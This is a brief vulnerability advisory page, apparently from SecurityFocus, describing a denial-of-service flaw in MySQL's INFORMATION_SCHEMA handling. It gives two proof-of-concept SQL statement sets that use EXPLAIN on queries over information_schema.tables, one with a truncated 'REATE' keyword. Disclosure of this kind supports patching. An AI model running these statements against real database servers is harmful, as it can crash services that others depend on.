MySQL INFORMATION_SCHEMA Remote Denial Of Service Vulnerability

The following proof-of-concept statements are available:

1.
REATE OR REPLACE VIEW test_view AS
SELECT
table_schema AS object_schema
,table_name AS object_name
,table_type AS object_type
FROM information_schema.tables
ORDER BY object_schema;

EXPLAIN SELECT * FROM test_view;

2.
explain select * from (select table_name from information_schema.tables ) AS a;


 

Privacy Statement
Copyright 2010, SecurityFocus